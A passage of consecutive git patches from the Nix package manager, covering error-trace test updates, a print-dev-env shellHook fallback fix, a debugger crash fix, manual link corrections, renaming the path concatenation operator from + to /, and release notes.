normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", "{ }"), + hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("cannot coerce %s to a string: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1152,7 +1152,7 @@ namespace nix { TEST_F(ErrorTraceTest, parseDrvName) { ASSERT_TRACE2("parseDrvName 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.parseDrvName")); } @@ -1161,12 +1161,12 @@ namespace nix { TEST_F(ErrorTraceTest, compareVersions) { ASSERT_TRACE2("compareVersions 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.compareVersions")); ASSERT_TRACE2("compareVersions \"abd\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.compareVersions")); } @@ -1175,7 +1175,7 @@ namespace nix { TEST_F(ErrorTraceTest, splitVersion) { ASSERT_TRACE2("splitVersion 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.splitVersion")); } From 770d2bc779d39c041293011892e80f5fcb6b76df Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:17:22 -0800 Subject: [PATCH 392/654] Key repeated values on attribute binding pointers, not value pointers Closes #8672 --- src/libexpr/print.cc | 4 ++-- tests/functional/repl.sh | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..915e8489a 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -152,7 +152,7 @@ struct ImportantFirstAttrNameCmp } }; -typedef std::set ValuesSeen; +typedef std::set ValuesSeen; class Printer { @@ -262,7 +262,7 @@ private: void printAttrs(Value & v, size_t depth) { - if (seen && !seen->insert(&v).second) { + if (seen && !seen->insert(v.attrs).second) { printRepeated(); return; } diff --git a/tests/functional/repl.sh b/tests/functional/repl.sh index 1b779c1f5..5f399aa44 100644 --- a/tests/functional/repl.sh +++ b/tests/functional/repl.sh @@ -156,7 +156,7 @@ testReplResponseNoRegex ' # Same for let expressions testReplResponseNoRegex ' let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = { ... }; y = { ... }; }' +' '{ x = «repeated»; y = { ... }; }' # The :p command should recursively print sets, but prevent infinite recursion testReplResponseNoRegex ' @@ -171,4 +171,4 @@ testReplResponseNoRegex ' # Same for let expressions testReplResponseNoRegex ' :p let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = { x = «repeated»; y = { a = 1; }; }; y = «repeated»; }' +' '{ x = «repeated»; y = { a = 1; }; }' From e1131b59279f7cf9f9bea93b5355608d78097f65 Mon Sep 17 00:00:00 2001 From: Rodney Lorrimar Date: Sun, 4 Feb 2024 12:02:06 +0800 Subject: [PATCH 393/654] print-dev-env: Avoid using unbound shellHook variable Some tools which consume the "nix print-dev-env" rc script (such as "nix-direnv") are sensitive to the use of unbound variables. They use "set -u". The "nix print-dev-env" rc script initially unsets "shellHook", then loads variables from the derivation, and then evaluates "shellHook". However, most derivations don't have a "shellHook" attribute. So users get the error "shellHook: unbound variable". This can be demonstrated with the command: nix print-dev-env nixpkgs#hello | bash -u This commit changes the rc script to provide an empty fallback value for the "shellHook" variable. Closes: #7951 #8253 --- src/nix/develop.cc | 2 +- tests/functional/nix-shell.sh | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 1f2891378..403178a5d 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -354,7 +354,7 @@ struct Common : InstallableCommand, MixProfile for (auto & i : {"TMP", "TMPDIR", "TEMP", "TEMPDIR"}) out << fmt("export %s=\"$NIX_BUILD_TOP\"\n", i); - out << "eval \"$shellHook\"\n"; + out << "eval \"${shellHook:-}\"\n"; auto script = out.str(); diff --git a/tests/functional/nix-shell.sh b/tests/functional/nix-shell.sh index 13403fadb..04c83138e 100644 --- a/tests/functional/nix-shell.sh +++ b/tests/functional/nix-shell.sh @@ -118,10 +118,10 @@ diff $TEST_ROOT/dev-env{,2}.json # Ensure `nix print-dev-env --json` contains variable assignments. [[ $(jq -r .variables.arr1.value[2] $TEST_ROOT/dev-env.json) = '3 4' ]] -# Run tests involving `source <(nix print-dev-inv)` in subshells to avoid modifying the current +# Run tests involving `source <(nix print-dev-env)` in subshells to avoid modifying the current # environment. -set +u # FIXME: Make print-dev-env `set -u` compliant (issue #7951) +set -u # Ensure `source <(nix print-dev-env)` modifies the environment. ( From 5ccb06ee1b4c757ff4ca0aa6eac15d5656f7774c Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 4 Feb 2024 16:42:00 +0100 Subject: [PATCH 394/654] fix debugger crashing while printing envs fixes #9932 --- .gitignore | 1 + src/libexpr/eval.cc | 8 +++++--- tests/functional/debugger.sh | 13 +++++++++++++ tests/functional/local.mk | 3 ++- 4 files changed, 21 insertions(+), 4 deletions(-) create mode 100644 tests/functional/debugger.sh diff --git a/.gitignore b/.gitignore index a47b195bb..a0a0786ed 100644 --- a/.gitignore +++ b/.gitignore @@ -94,6 +94,7 @@ perl/Makefile.config /tests/functional/ca/config.nix /tests/functional/dyn-drv/config.nix /tests/functional/repl-result-out +/tests/functional/debugger-test-out /tests/functional/test-libstoreconsumer/test-libstoreconsumer # /tests/functional/lang/ diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..398eec410 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -744,7 +744,8 @@ void printEnvBindings(const SymbolTable & st, const StaticEnv & se, const Env & if (se.up && env.up) { std::cout << "static: "; printStaticEnvBindings(st, se); - printWithBindings(st, env); + if (se.isWith) + printWithBindings(st, env); std::cout << std::endl; printEnvBindings(st, *se.up, *env.up, ++lvl); } else { @@ -756,7 +757,8 @@ void printEnvBindings(const SymbolTable & st, const StaticEnv & se, const Env & std::cout << st[i.first] << " "; std::cout << ANSI_NORMAL; std::cout << std::endl; - printWithBindings(st, env); // probably nothing there for the top level. + if (se.isWith) + printWithBindings(st, env); // probably nothing there for the top level. std::cout << std::endl; } @@ -778,7 +780,7 @@ void mapStaticEnvBindings(const SymbolTable & st, const StaticEnv & se, const En if (env.up && se.up) { mapStaticEnvBindings(st, *se.up, *env.up, vm); - if (!env.values[0]->isThunk()) { + if (se.isWith && !env.values[0]->isThunk()) { // add 'with' bindings. Bindings::iterator j = env.values[0]->attrs->begin(); while (j != env.values[0]->attrs->end()) { diff --git a/tests/functional/debugger.sh b/tests/functional/debugger.sh new file mode 100644 index 000000000..63d88cbf3 --- /dev/null +++ b/tests/functional/debugger.sh @@ -0,0 +1,13 @@ +source common.sh + +clearStore + +# regression #9932 +echo ":env" | expect 1 nix eval --debugger --expr '(_: throw "oh snap") 42' +echo ":env" | expect 1 nix eval --debugger --expr ' + let x.a = 1; in + with x; + (_: builtins.seq x.a (throw "oh snap")) x.a +' >debugger-test-out +grep -P 'with: .*a' debugger-test-out +grep -P 'static: .*x' debugger-test-out diff --git a/tests/functional/local.mk b/tests/functional/local.mk index 888c7e18a..f369c7c2c 100644 --- a/tests/functional/local.mk +++ b/tests/functional/local.mk @@ -127,7 +127,8 @@ nix_tests = \ toString-path.sh \ read-only-store.sh \ nested-sandboxing.sh \ - impure-env.sh + impure-env.sh \ + debugger.sh ifeq ($(HAVE_LIBCPUID), 1) nix_tests += compute-levels.sh From 721fddac2f1cb633823046d97f465c579540de43 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 4 Feb 2024 22:03:13 +0100 Subject: [PATCH 395/654] use the right heading level (#9935) --- doc/manual/src/installation/upgrading.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/installation/upgrading.md b/doc/manual/src/installation/upgrading.md index 47618e2f5..38edcdbc5 100644 --- a/doc/manual/src/installation/upgrading.md +++ b/doc/manual/src/installation/upgrading.md @@ -16,7 +16,7 @@ nix (Nix) 2.18.1 > Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with [`nix-build`](@docroot@/command-ref/nix-build.md) or [`nix-store --realise`](@docroot@/command-ref/nix-store/realise.md), may change the database schema! > Reverting to an older version of Nix may therefore require purging the store database before it can be used. -### Linux multi-user +## Linux multi-user ```console $ sudo su From 8b873edcca2ff9f9f11efe3cba42a291dbdd124a Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 4 Feb 2024 22:15:20 +0100 Subject: [PATCH 396/654] fix anchor link; less weird link texts (#9936) --- doc/manual/src/language/operators.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/doc/manual/src/language/operators.md b/doc/manual/src/language/operators.md index e9cbb5c92..6fd66864b 100644 --- a/doc/manual/src/language/operators.md +++ b/doc/manual/src/language/operators.md @@ -84,7 +84,7 @@ The `+` operator is overloaded to also work on strings and paths. > > *string* `+` *string* -Concatenate two [string]s and merge their string contexts. +Concatenate two [strings][string] and merge their string contexts. [String concatenation]: #string-concatenation @@ -94,7 +94,7 @@ Concatenate two [string]s and merge their string contexts. > > *path* `+` *path* -Concatenate two [path]s. +Concatenate two [paths][path]. The result is a path. [Path concatenation]: #path-concatenation @@ -150,9 +150,9 @@ If an attribute name is present in both, the attribute value from the latter is Comparison is -- [arithmetic] for [number]s -- lexicographic for [string]s and [path]s -- item-wise lexicographic for [list]s: +- [arithmetic] for [numbers][number] +- lexicographic for [strings][string] and [paths][path] +- item-wise lexicographic for [lists][list]: elements at the same index in both lists are compared according to their type and skipped if they are equal. All comparison operators are implemented in terms of `<`, and the following equivalencies hold: @@ -163,12 +163,12 @@ All comparison operators are implemented in terms of `<`, and the following equi | *a* `>` *b* | *b* `<` *a* | | *a* `>=` *b* | `! (` *a* `<` *b* `)` | -[Comparison]: #comparison-operators +[Comparison]: #comparison ## Equality -- [Attribute sets][attribute set] and [list]s are compared recursively, and therefore are fully evaluated. -- Comparison of [function]s always returns `false`. +- [Attribute sets][attribute set] and [lists][list] are compared recursively, and therefore are fully evaluated. +- Comparison of [functions][function] always returns `false`. - Numbers are type-compatible, see [arithmetic] operators. - Floating point numbers only differ up to a limited precision. From 8d4890c3f83366a0d40ed7f9c3ee21dbd6a2ef67 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 4 Feb 2024 22:45:10 +0100 Subject: [PATCH 397/654] catch multiple use of link reference (#9937) --- doc/manual/src/language/import-from-derivation.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/doc/manual/src/language/import-from-derivation.md b/doc/manual/src/language/import-from-derivation.md index 03b3f9d91..fb12ba51a 100644 --- a/doc/manual/src/language/import-from-derivation.md +++ b/doc/manual/src/language/import-from-derivation.md @@ -1,6 +1,8 @@ # Import From Derivation -The value of a Nix expression can depend on the contents of a [store object](@docroot@/glossary.md#gloss-store-object). +The value of a Nix expression can depend on the contents of a [store object]. + +[store object]: @docroot@/glossary.md#gloss-store-object Passing an expression `expr` that evaluates to a [store path](@docroot@/glossary.md#gloss-store-path) to any built-in function which reads from the filesystem constitutes Import From Derivation (IFD): From a6737b7e179fba2681393335c69c97df9bd5a2b0 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 5 Feb 2024 15:13:11 +0100 Subject: [PATCH 398/654] CanonPath, SourcePath: Change operator + to / This is less confusing and makes it more similar to std::filesystem::path. --- src/libexpr/eval.cc | 4 ++-- src/libexpr/primops.cc | 2 +- src/libfetchers/filtering-input-accessor.cc | 14 +++++++------- src/libfetchers/fs-input-accessor.cc | 2 +- src/libfetchers/git-utils.cc | 2 +- src/libfetchers/git.cc | 4 ++-- src/libfetchers/mercurial.cc | 2 +- src/libfetchers/path.cc | 2 +- src/libstore/binary-cache-store.cc | 4 ++-- src/libstore/local-fs-store.cc | 2 +- src/libstore/nar-accessor.cc | 2 +- src/libutil/archive.cc | 10 +++++----- src/libutil/canon-path.cc | 4 ++-- src/libutil/canon-path.hh | 4 ++-- src/libutil/fs-sink.cc | 2 +- src/libutil/git.cc | 2 +- src/libutil/source-path.cc | 8 ++++---- src/libutil/source-path.hh | 5 +++-- src/nix-env/nix-env.cc | 4 ++-- src/nix/ls.cc | 2 +- src/nix/run.cc | 2 +- src/nix/why-depends.cc | 2 +- tests/unit/libutil/canon-path.cc | 10 +++++----- 23 files changed, 48 insertions(+), 47 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..bebc94873 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2689,14 +2689,14 @@ SourcePath resolveExprPath(SourcePath path) // Basic cycle/depth limit to avoid infinite loops. if (++followCount >= maxFollow) throw Error("too many symbolic links encountered while traversing the path '%s'", path); - auto p = path.parent().resolveSymlinks() + path.baseName(); + auto p = path.parent().resolveSymlinks() / path.baseName(); if (p.lstat().type != InputAccessor::tSymlink) break; path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; } /* If `path' refers to a directory, append `/default.nix'. */ if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) - return path + "default.nix"; + return path / "default.nix"; return path; } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 1197b6e13..f8ded0cf8 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1816,7 +1816,7 @@ static void prim_readDir(EvalState & state, const PosIdx pos, Value * * args, Va // detailed node info quickly in this case we produce a thunk to // query the file type lazily. auto epath = state.allocValue(); - epath->mkPath(path + name); + epath->mkPath(path / name); if (!readFileType) readFileType = &state.getBuiltin("readFileType"); attr.mkApp(readFileType, epath); diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc index 581ce3c1d..087a100af 100644 --- a/src/libfetchers/filtering-input-accessor.cc +++ b/src/libfetchers/filtering-input-accessor.cc @@ -5,26 +5,26 @@ namespace nix { std::string FilteringInputAccessor::readFile(const CanonPath & path) { checkAccess(path); - return next->readFile(prefix + path); + return next->readFile(prefix / path); } bool FilteringInputAccessor::pathExists(const CanonPath & path) { - return isAllowed(path) && next->pathExists(prefix + path); + return isAllowed(path) && next->pathExists(prefix / path); } std::optional FilteringInputAccessor::maybeLstat(const CanonPath & path) { checkAccess(path); - return next->maybeLstat(prefix + path); + return next->maybeLstat(prefix / path); } InputAccessor::DirEntries FilteringInputAccessor::readDirectory(const CanonPath & path) { checkAccess(path); DirEntries entries; - for (auto & entry : next->readDirectory(prefix + path)) { - if (isAllowed(path + entry.first)) + for (auto & entry : next->readDirectory(prefix / path)) { + if (isAllowed(path / entry.first)) entries.insert(std::move(entry)); } return entries; @@ -33,12 +33,12 @@ InputAccessor::DirEntries FilteringInputAccessor::readDirectory(const CanonPath std::string FilteringInputAccessor::readLink(const CanonPath & path) { checkAccess(path); - return next->readLink(prefix + path); + return next->readLink(prefix / path); } std::string FilteringInputAccessor::showPath(const CanonPath & path) { - return next->showPath(prefix + path); + return next->showPath(prefix / path); } void FilteringInputAccessor::checkAccess(const CanonPath & path) diff --git a/src/libfetchers/fs-input-accessor.cc b/src/libfetchers/fs-input-accessor.cc index c3d8d273c..46bc6b70d 100644 --- a/src/libfetchers/fs-input-accessor.cc +++ b/src/libfetchers/fs-input-accessor.cc @@ -48,7 +48,7 @@ struct FSInputAccessor : InputAccessor, PosixSourceAccessor CanonPath makeAbsPath(const CanonPath & path) { - return root + path; + return root / path; } std::optional getPhysicalPath(const CanonPath & path) override diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 382a363f0..1256a4c2c 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -295,7 +295,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this throw Error("getting working directory status: %s", git_error_last()->message); /* Get submodule info. */ - auto modulesFile = path + ".gitmodules"; + auto modulesFile = path / ".gitmodules"; if (pathExists(modulesFile.abs())) info.submodules = parseSubmodules(modulesFile); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index f9a1cb1bc..26fe79596 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -319,7 +319,7 @@ struct GitInputScheme : InputScheme if (!repoInfo.isLocal) throw Error("cannot commit '%s' to Git repository '%s' because it's not a working tree", path, input.to_string()); - writeFile((CanonPath(repoInfo.url) + path).abs(), contents); + writeFile((CanonPath(repoInfo.url) / path).abs(), contents); auto result = runProgram(RunOptions { .program = "git", @@ -680,7 +680,7 @@ struct GitInputScheme : InputScheme std::map> mounts; for (auto & submodule : repoInfo.workdirInfo.submodules) { - auto submodulePath = CanonPath(repoInfo.url) + submodule.path; + auto submodulePath = CanonPath(repoInfo.url) / submodule.path; fetchers::Attrs attrs; attrs.insert_or_assign("type", "git"); attrs.insert_or_assign("url", submodulePath.abs()); diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index 9982389ab..55e2eae03 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -141,7 +141,7 @@ struct MercurialInputScheme : InputScheme if (!isLocal) throw Error("cannot commit '%s' to Mercurial repository '%s' because it's not a working tree", path, input.to_string()); - auto absPath = CanonPath(repoPath) + path; + auto absPath = CanonPath(repoPath) / path; writeFile(absPath.abs(), contents); diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc index f9b973320..d3b0e475d 100644 --- a/src/libfetchers/path.cc +++ b/src/libfetchers/path.cc @@ -84,7 +84,7 @@ struct PathInputScheme : InputScheme std::string_view contents, std::optional commitMsg) const override { - writeFile((CanonPath(getAbsPath(input)) + path).abs(), contents); + writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents); } CanonPath getAbsPath(const Input & input) const diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index ea1279e2e..189d1d305 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -235,14 +235,14 @@ ref BinaryCacheStore::addToStoreCommon( std::regex regex2("^[0-9a-f]{38}\\.debug$"); for (auto & [s1, _type] : narAccessor->readDirectory(buildIdDir)) { - auto dir = buildIdDir + s1; + auto dir = buildIdDir / s1; if (narAccessor->lstat(dir).type != SourceAccessor::tDirectory || !std::regex_match(s1, regex1)) continue; for (auto & [s2, _type] : narAccessor->readDirectory(dir)) { - auto debugPath = dir + s2; + auto debugPath = dir / s2; if (narAccessor->lstat(debugPath).type != SourceAccessor::tRegular || !std::regex_match(s2, regex2)) diff --git a/src/libstore/local-fs-store.cc b/src/libstore/local-fs-store.cc index 953f3a264..81c385ddb 100644 --- a/src/libstore/local-fs-store.cc +++ b/src/libstore/local-fs-store.cc @@ -28,7 +28,7 @@ struct LocalStoreAccessor : PosixSourceAccessor auto [storePath, rest] = store->toStorePath(path.abs()); if (requireValidPath && !store->isValidPath(storePath)) throw InvalidPath("path '%1%' is not a valid store path", store->printStorePath(storePath)); - return CanonPath(store->getRealStoreDir()) + storePath.to_string() + CanonPath(rest); + return CanonPath(store->getRealStoreDir()) / storePath.to_string() / CanonPath(rest); } std::optional maybeLstat(const CanonPath & path) override diff --git a/src/libstore/nar-accessor.cc b/src/libstore/nar-accessor.cc index b13e4c52c..cecf8148f 100644 --- a/src/libstore/nar-accessor.cc +++ b/src/libstore/nar-accessor.cc @@ -277,7 +277,7 @@ json listNar(ref accessor, const CanonPath & path, bool recurse) json &res2 = obj["entries"]; for (const auto & [name, type] : accessor->readDirectory(path)) { if (recurse) { - res2[name] = listNar(accessor, path + name, true); + res2[name] = listNar(accessor, path / name, true); } else res2[name] = json::object(); } diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 6062392cd..b783b29e0 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -77,20 +77,20 @@ void SourceAccessor::dumpPath( std::string name(i.first); size_t pos = i.first.find(caseHackSuffix); if (pos != std::string::npos) { - debug("removing case hack suffix from '%s'", path + i.first); + debug("removing case hack suffix from '%s'", path / i.first); name.erase(pos); } if (!unhacked.emplace(name, i.first).second) throw Error("file name collision in between '%s' and '%s'", - (path + unhacked[name]), - (path + i.first)); + (path / unhacked[name]), + (path / i.first)); } else unhacked.emplace(i.first, i.first); for (auto & i : unhacked) - if (filter((path + i.first).abs())) { + if (filter((path / i.first).abs())) { sink << "entry" << "(" << "name" << i.first << "node"; - dump(path + i.second); + dump(path / i.second); sink << ")"; } } diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc index 0a0f96a05..bf948be5d 100644 --- a/src/libutil/canon-path.cc +++ b/src/libutil/canon-path.cc @@ -63,7 +63,7 @@ void CanonPath::extend(const CanonPath & x) path += x.abs(); } -CanonPath CanonPath::operator + (const CanonPath & x) const +CanonPath CanonPath::operator / (const CanonPath & x) const { auto res = *this; res.extend(x); @@ -78,7 +78,7 @@ void CanonPath::push(std::string_view c) path += c; } -CanonPath CanonPath::operator + (std::string_view c) const +CanonPath CanonPath::operator / (std::string_view c) const { auto res = *this; res.push(c); diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index 997c8c731..fb2d9244b 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -190,14 +190,14 @@ public: /** * Concatenate two paths. */ - CanonPath operator + (const CanonPath & x) const; + CanonPath operator / (const CanonPath & x) const; /** * Add a path component to this one. It must not contain any slashes. */ void push(std::string_view c); - CanonPath operator + (std::string_view c) const; + CanonPath operator / (std::string_view c) const; /** * Check whether access to this path is allowed, which is the case diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc index b6f8db592..95b6088da 100644 --- a/src/libutil/fs-sink.cc +++ b/src/libutil/fs-sink.cc @@ -34,7 +34,7 @@ void copyRecursive( sink.createDirectory(to); for (auto & [name, _] : accessor.readDirectory(from)) { copyRecursive( - accessor, from + name, + accessor, from / name, sink, to + "/" + name); break; } diff --git a/src/libutil/git.cc b/src/libutil/git.cc index 3b8c3ebac..5733531fa 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -259,7 +259,7 @@ Mode dump( { Tree entries; for (auto & [name, _] : accessor.readDirectory(path)) { - auto child = path + name; + auto child = path / name; if (!filter(child.abs())) continue; auto entry = hook(child); diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc index d85b0b7fe..341daf39c 100644 --- a/src/libutil/source-path.cc +++ b/src/libutil/source-path.cc @@ -41,11 +41,11 @@ std::optional SourcePath::getPhysicalPath() const std::string SourcePath::to_string() const { return accessor->showPath(path); } -SourcePath SourcePath::operator+(const CanonPath & x) const -{ return {accessor, path + x}; } +SourcePath SourcePath::operator / (const CanonPath & x) const +{ return {accessor, path / x}; } -SourcePath SourcePath::operator+(std::string_view c) const -{ return {accessor, path + c}; } +SourcePath SourcePath::operator / (std::string_view c) const +{ return {accessor, path / c}; } bool SourcePath::operator==(const SourcePath & x) const { diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh index bf5625ca5..bde07b08f 100644 --- a/src/libutil/source-path.hh +++ b/src/libutil/source-path.hh @@ -89,14 +89,15 @@ struct SourcePath /** * Append a `CanonPath` to this path. */ - SourcePath operator + (const CanonPath & x) const; + SourcePath operator / (const CanonPath & x) const; /** * Append a single component `c` to this path. `c` must not * contain a slash. A slash is implicitly added between this path * and `c`. */ - SourcePath operator+(std::string_view c) const; + SourcePath operator / (std::string_view c) const; + bool operator==(const SourcePath & x) const; bool operator!=(const SourcePath & x) const; bool operator<(const SourcePath & x) const; diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index d5b46c57a..dfc6e70eb 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -97,7 +97,7 @@ static bool isNixExpr(const SourcePath & path, struct InputAccessor::Stat & st) { return st.type == InputAccessor::tRegular - || (st.type == InputAccessor::tDirectory && (path + "default.nix").resolveSymlinks().pathExists()); + || (st.type == InputAccessor::tDirectory && (path / "default.nix").resolveSymlinks().pathExists()); } @@ -116,7 +116,7 @@ static void getAllExprs(EvalState & state, are implemented using profiles). */ if (i == "manifest.nix") continue; - auto path2 = (path + i).resolveSymlinks(); + auto path2 = (path / i).resolveSymlinks(); InputAccessor::Stat st; try { diff --git a/src/nix/ls.cc b/src/nix/ls.cc index 231456c9c..63f97f2d3 100644 --- a/src/nix/ls.cc +++ b/src/nix/ls.cc @@ -72,7 +72,7 @@ struct MixLs : virtual Args, MixJSON if (st.type == SourceAccessor::Type::tDirectory && !showDirectory) { auto names = accessor->readDirectory(curPath); for (auto & [name, type] : names) - showFile(curPath + name, relPath + "/" + name); + showFile(curPath / name, relPath + "/" + name); } else showFile(curPath, relPath); }; diff --git a/src/nix/run.cc b/src/nix/run.cc index 9bca5b9d0..e86837679 100644 --- a/src/nix/run.cc +++ b/src/nix/run.cc @@ -124,7 +124,7 @@ struct CmdShell : InstallablesCommand, MixEnvironment if (true) pathAdditions.push_back(store->printStorePath(path) + "/bin"); - auto propPath = CanonPath(store->printStorePath(path)) + "nix-support" + "propagated-user-env-packages"; + auto propPath = CanonPath(store->printStorePath(path)) / "nix-support" / "propagated-user-env-packages"; if (auto st = accessor->maybeLstat(propPath); st && st->type == SourceAccessor::tRegular) { for (auto & p : tokenizeString(accessor->readFile(propPath))) todo.push(store->parseStorePath(p)); diff --git a/src/nix/why-depends.cc b/src/nix/why-depends.cc index aecf65922..e299585ff 100644 --- a/src/nix/why-depends.cc +++ b/src/nix/why-depends.cc @@ -225,7 +225,7 @@ struct CmdWhyDepends : SourceExprCommand, MixOperateOnOptions if (st->type == SourceAccessor::Type::tDirectory) { auto names = accessor->readDirectory(p); for (auto & [name, type] : names) - visitPath(p + name); + visitPath(p / name); } else if (st->type == SourceAccessor::Type::tRegular) { diff --git a/tests/unit/libutil/canon-path.cc b/tests/unit/libutil/canon-path.cc index fc94ccc3d..bf11abe3e 100644 --- a/tests/unit/libutil/canon-path.cc +++ b/tests/unit/libutil/canon-path.cc @@ -80,29 +80,29 @@ namespace nix { { CanonPath p1("a//foo/bar//"); CanonPath p2("xyzzy/bla"); - ASSERT_EQ((p1 + p2).abs(), "/a/foo/bar/xyzzy/bla"); + ASSERT_EQ((p1 / p2).abs(), "/a/foo/bar/xyzzy/bla"); } { CanonPath p1("/"); CanonPath p2("/a/b"); - ASSERT_EQ((p1 + p2).abs(), "/a/b"); + ASSERT_EQ((p1 / p2).abs(), "/a/b"); } { CanonPath p1("/a/b"); CanonPath p2("/"); - ASSERT_EQ((p1 + p2).abs(), "/a/b"); + ASSERT_EQ((p1 / p2).abs(), "/a/b"); } { CanonPath p("/foo/bar"); - ASSERT_EQ((p + "x").abs(), "/foo/bar/x"); + ASSERT_EQ((p / "x").abs(), "/foo/bar/x"); } { CanonPath p("/"); - ASSERT_EQ((p + "foo" + "bar").abs(), "/foo/bar"); + ASSERT_EQ((p / "foo" / "bar").abs(), "/foo/bar"); } } From 24205a87039cab89e6efcd6ec7d62de1c2c3b51f Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:00:39 -0800 Subject: [PATCH 399/654] Add release note --- ...-location-in-while-evaluating-attribute.md | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 doc/manual/rl-next/source-location-in-while-evaluating-attribute.md diff --git a/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md b/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md new file mode 100644 index 000000000..0e0b74c5a --- /dev/null +++ b/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md @@ -0,0 +1,23 @@ +--- +synopsis: "In the debugger, `while evaluating the attribute` errors now include position information" +prs: 9915 +--- + +Before: + +``` +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +0x600001522598 +``` + +After: + +``` +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27 + + 131| + 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs; + | ^ + 133| in +``` From 601fc7d15978827a04a1bc44e92a8a42a512f50a Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:13:26 -0800 Subject: [PATCH 400/654] Add release note --- ...debugger-more-reliably-in-let-and-calls.md | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 